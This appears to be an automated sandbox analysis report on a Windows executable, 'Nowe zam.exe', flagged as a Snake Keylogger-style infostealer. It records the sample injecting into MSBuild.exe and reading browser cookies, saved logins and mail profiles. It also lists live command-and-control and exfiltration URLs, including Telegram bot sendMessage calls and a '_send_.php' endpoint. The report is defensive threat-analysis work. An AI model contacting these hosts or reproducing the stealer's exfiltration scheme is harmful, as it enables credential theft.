                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nowe zam.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Stealing of Sensitive Information

                  barindex
                  Source: Yara matchFile source: 00000004.00000002.4773046764.0000000002C21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 4.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Nowe zam.exe.41bb708.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Nowe zam.exe.41784e8.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Nowe zam.exe.41bb708.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Nowe zam.exe.41784e8.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000004.00000002.4771168681.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2344766736.0000000004178000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: Nowe zam.exe PID: 6828, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 1016, type: MEMORYSTR
                  Source: Yara matchFile source: 4.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Nowe zam.exe.41bb708.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Nowe zam.exe.41784e8.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Nowe zam.exe.41bb708.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Nowe zam.exe.41784e8.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000004.00000002.4773046764.0000000002DA2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.4771168681.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2344766736.0000000004178000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: Nowe zam.exe PID: 6828, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 1016, type: MEMORYSTR
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top SitesJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Source: Yara matchFile source: 4.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Nowe zam.exe.41bb708.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Nowe zam.exe.41784e8.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Nowe zam.exe.41bb708.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Nowe zam.exe.41784e8.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000004.00000002.4771168681.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2344766736.0000000004178000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: Nowe zam.exe PID: 6828, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 1016, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Source: Yara matchFile source: 00000004.00000002.4773046764.0000000002C21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 4.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Nowe zam.exe.41bb708.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Nowe zam.exe.41784e8.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Nowe zam.exe.41bb708.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Nowe zam.exe.41784e8.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000004.00000002.4771168681.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2344766736.0000000004178000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: Nowe zam.exe PID: 6828, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 1016, type: MEMORYSTR
                  Source: Yara matchFile source: 4.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Nowe zam.exe.41bb708.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Nowe zam.exe.41784e8.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Nowe zam.exe.41bb708.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Nowe zam.exe.41784e8.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000004.00000002.4773046764.0000000002DA2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.4771168681.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2344766736.0000000004178000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: Nowe zam.exe PID: 6828, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 1016, type: MEMORYSTR
                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
                  DLL Side-Loading
                  311
                  Process Injection
                  11
                  Disable or Modify Tools
                  1
                  OS Credential Dumping
                  1
                  Security Software Discovery
                  Remote Services1
                  Email Collection
                  1
                  Web Service
                  Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                  DLL Side-Loading
                  31
                  Virtualization/Sandbox Evasion
                  LSASS Memory1
                  Process Discovery
                  Remote Desktop Protocol11
                  Archive Collected Data
                  11
                  Encrypted Channel
                  Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)311
                  Process Injection
                  Security Account Manager31
                  Virtualization/Sandbox Evasion
                  SMB/Windows Admin Shares1
                  Data from Local System
                  1
                  Non-Standard Port
                  Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                  Deobfuscate/Decode Files or Information
                  NTDS1
                  Application Window Discovery
                  Distributed Component Object ModelInput Capture3
                  Ingress Tool Transfer
                  Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script3
                  Obfuscated Files or Information
                  LSA Secrets1
                  System Network Configuration Discovery
                  SSHKeylogging3
                  Non-Application Layer Protocol
                  Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts12
                  Software Packing
                  Cached Domain Credentials1
                  File and Directory Discovery
                  VNCGUI Input Capture24
                  Application Layer Protocol
                  Data Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                  DLL Side-Loading
                  DCSync13
                  System Information Discovery
                  Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand
                  SourceDetectionScannerLabelLink
                  Nowe zam.exe24%ReversingLabs
                  Nowe zam.exe100%AviraHEUR/AGEN.1309508
                  Nowe zam.exe100%Joe Sandbox ML
                  No Antivirus matches
                  No Antivirus matches
                  No Antivirus matches
                  SourceDetectionScannerLabelLink
                  http://mail.tlakovec.si0%Avira URL Cloudsafe
                  NameIPActiveMaliciousAntivirus DetectionReputation
                  bg.microsoft.map.fastly.net
                  199.232.214.172
                  truefalse
                    high
                    reallyfreegeoip.org
                    188.114.96.3
                    truefalse
                      high
                      mail.tlakovec.si
                      212.44.112.138
                      truetrue
                        unknown
                        api.telegram.org
                        149.154.167.220
                        truefalse
                          high
                          fp2e7a.wpc.phicdn.net
                          192.229.221.95
                          truefalse
                            high
                            checkip.dyndns.com
                            158.101.44.242
                            truefalse
                              high
                              checkip.dyndns.org
                              unknown
                              unknownfalse
                                high
                                NameMaliciousAntivirus DetectionReputation
                                https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:783875%0D%0ADate%20and%20Time:%2007/11/2024%20/%2019:53:00%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20783875%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                                  high
                                  http://checkip.dyndns.org/false
                                    high
                                    https://reallyfreegeoip.org/xml/173.254.250.79false
                                      high
                                      NameSourceMaliciousAntivirus DetectionReputation
                                      https://www.office.com/MSBuild.exe, 00000004.00000002.4773046764.0000000002E18000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.4773046764.0000000002E09000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.4773046764.0000000002E13000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://duckduckgo.com/chrome_newtabMSBuild.exe, 00000004.00000002.4775885967.0000000003C41000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://duckduckgo.com/ac/?q=MSBuild.exe, 00000004.00000002.4775885967.0000000003C41000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://api.telegram.orgMSBuild.exe, 00000004.00000002.4773046764.0000000002D0A000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://www.google.com/images/branding/product/ico/googleg_lodp.icoMSBuild.exe, 00000004.00000002.4775885967.0000000003C41000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://api.telegram.org/botNowe zam.exe, 00000000.00000002.2344766736.0000000004178000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.4773046764.0000000002D0A000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.4771168681.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                  high
                                                  https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:783875%0D%0ADate%20aMSBuild.exe, 00000004.00000002.4773046764.0000000002D0A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=MSBuild.exe, 00000004.00000002.4775885967.0000000003C41000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      http://checkip.dyndns.orgMSBuild.exe, 00000004.00000002.4773046764.0000000002C21000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=MSBuild.exe, 00000004.00000002.4775885967.0000000003C41000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://api.telegram.org/bot/sendMessage?chat_id=&text=MSBuild.exe, 00000004.00000002.4773046764.0000000002D0A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            https://chrome.google.com/webstore?hl=enMSBuild.exe, 00000004.00000002.4773046764.0000000002DE7000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.4773046764.0000000002E18000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.4773046764.0000000002DD8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://www.ecosia.org/newtab/MSBuild.exe, 00000004.00000002.4775885967.0000000003C41000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                http://varders.kozow.com:8081Nowe zam.exe, 00000000.00000002.2344766736.0000000004178000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.4771168681.0000000000402000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.4773046764.0000000002C21000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://aborters.duckdns.org:8081Nowe zam.exe, 00000000.00000002.2344766736.0000000004178000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.4771168681.0000000000402000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.4773046764.0000000002C21000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://ac.ecosia.org/autocomplete?q=MSBuild.exe, 00000004.00000002.4775885967.0000000003C41000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://reallyfreegeoip.org/xml/173.254.250.79$MSBuild.exe, 00000004.00000002.4773046764.0000000002CE2000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.4773046764.0000000002D0A000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.4773046764.0000000002C9C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://51.38.247.67:8081/_send_.php?LMSBuild.exe, 00000004.00000002.4773046764.0000000002DA2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://anotherarmy.dns.army:8081Nowe zam.exe, 00000000.00000002.2344766736.0000000004178000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.4771168681.0000000000402000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.4773046764.0000000002C21000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchMSBuild.exe, 00000004.00000002.4775885967.0000000003C41000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              http://checkip.dyndns.org/qNowe zam.exe, 00000000.00000002.2344766736.0000000004178000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.4771168681.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://reallyfreegeoip.orgMSBuild.exe, 00000004.00000002.4773046764.0000000002CE2000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.4773046764.0000000002D0A000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.4773046764.0000000002C72000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://mail.tlakovec.siMSBuild.exe, 00000004.00000002.4773046764.0000000002DA2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameNowe zam.exe, 00000000.00000002.2344204160.0000000002840000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.4773046764.0000000002C21000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=MSBuild.exe, 00000004.00000002.4775885967.0000000003C41000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencodedNowe zam.exe, 00000000.00000002.2344766736.0000000004178000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.4771168681.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://reallyfreegeoip.org/xml/Nowe zam.exe, 00000000.00000002.2344766736.0000000004178000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.4771168681.0000000000402000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.4773046764.0000000002C72000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          • No. of IPs < 25%
                                                                                          • 25% < No. of IPs < 50%
                                                                                          • 50% < No. of IPs < 75%
                                                                                          • 75% < No. of IPs
                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                          149.154.167.220
                                                                                          api.telegram.orgUnited Kingdom
                                                                                          62041TELEGRAMRUfalse
                                                                                          188.114.96.3
                                                                                          reallyfreegeoip.orgEuropean Union
                                                                                          13335CLOUDFLARENETUSfalse
                                                                                          158.101.44.242
                                                                                          checkip.dyndns.comUnited States
                                                                                          31898ORACLE-BMC-31898USfalse
                                                                                          212.44.112.138
                                                                                          mail.tlakovec.siSlovenia
                                                                                          43128DHH-ASSItrue
                                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                                          Analysis ID:1551046
                                                                                          Start date and time:2024-11-07 12:48:09 +01:00
                                                                                          Joe Sandbox product:CloudBasic
                                                                                          Overall analysis duration:0h 8m 25s
                                                                                          Hypervisor based Inspection enabled:false
                                                                                          Report type:full
                                                                                          Cookbook file name:default.jbs
                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                          Number of analysed new started processes analysed:8
                                                                                          Number of new started drivers analysed:0
                                                                                          Number of existing processes analysed:0
                                                                                          Number of existing drivers analysed:0
                                                                                          Number of injected processes analysed:0
                                                                                          Technologies:
                                                                                          • HCA enabled
                                                                                          • EGA enabled
                                                                                          • AMSI enabled
                                                                                          Analysis Mode:default
                                                                                          Analysis stop reason:Timeout
                                                                                          Sample name:Nowe zam.exe
                                                                                          Detection:MAL
                                                                                          Classification:mal100.spre.troj.spyw.evad.winEXE@6/5@4/4
                                                                                          EGA Information:
                                                                                          • Successful, ratio: 100%
                                                                                          HCA Information:
                                                                                          • Successful, ratio: 99%
                                                                                          • Number of executed functions: 245
                                                                                          • Number of non-executed functions: 22
                                                                                          Cookbook Comments:
                                                                                          • Found application associated with file extension: .exe
                                                                                          • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                                                          • Excluded IPs from analysis (whitelisted): 184.28.90.27, 20.109.210.53, 199.232.214.172, 192.229.221.95, 40.69.42.241, 52.165.164.15
                                                                                          • Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, ocsp.digicert.com, e16604.g.akamaiedge.net, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net
                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                          • Report size getting too big, too many NtCreateKey calls found.
                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                          • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                          • VT rate limit hit for: Nowe zam.exe
                                                                                          TimeTypeDescription
                                                                                          06:49:06API Interceptor1x Sleep call for process: Nowe zam.exe modified
                                                                                          06:49:07API Interceptor8x Sleep call for process: powershell.exe modified
                                                                                          06:49:09API Interceptor11377628x Sleep call for process: MSBuild.exe modified
                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                          149.154.167.220Ce3CNfP8N6.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                            KNARH81GDR5261301.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                              SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                FmmYUD4pt7.wsfGet hashmaliciousUnknownBrowse
                                                                                                  05.11.241591883_UyeIsyeriCalismanKosullari.xlxs.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                    x6BqJ693rc.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                      doc20247622056002_pentamix.batGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                        5gz6ZZRQWh.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                          46roqD3HEE.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                            iENcsTur6E.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                              188.114.96.3Aviso de pago.xla.xlsxGet hashmaliciousHTMLPhisherBrowse
                                                                                                              • paste.ee/d/PAg0l
                                                                                                              QUOTATION_NOVQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                              • filetransfer.io/data-package/8shpYIj5/download
                                                                                                              QUOTATION_NOVQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                              • filetransfer.io/data-package/CXujY04Y/download
                                                                                                              QUOTATION_NOVQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                              • filetransfer.io/data-package/O2nyeCCn/download
                                                                                                              2rI5YEg7uo.exeGet hashmaliciousFormBookBrowse
                                                                                                              • www.evoolixyppuk.shop/7gfa/?pP=OC/NqFuXSoQKcxJzIwbC8gc6YWk63HA88JkIsR5MBtbsuoT1qNc3mE+usci2f4e+0fIXV/Px1LgbGc4SbpFIftMOxDoszWQURSPAVqq521dqxxqHUw==&UJO=A6MH4FUp
                                                                                                              createdbestthingswithgoodnewswithgreatfriendship.htaGet hashmaliciousCobalt Strike, HTMLPhisherBrowse
                                                                                                              • paste.ee/d/PAg0l
                                                                                                              QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                              • filetransfer.io/data-package/O7tfWEfj/download
                                                                                                              NIlfETZ9aE.exeGet hashmaliciousFormBookBrowse
                                                                                                              • www.timizoasisey.shop/agaq/
                                                                                                              https://www.imap.ne.jp/banner_click/add/20/1/?a&url=http://uniteseoul.comGet hashmaliciousHTMLPhisherBrowse
                                                                                                              • uniteseoul.com/
                                                                                                              ffsBbRe8UN.exeGet hashmaliciousFormBookBrowse
                                                                                                              • www.serverplay.live/sp1b/
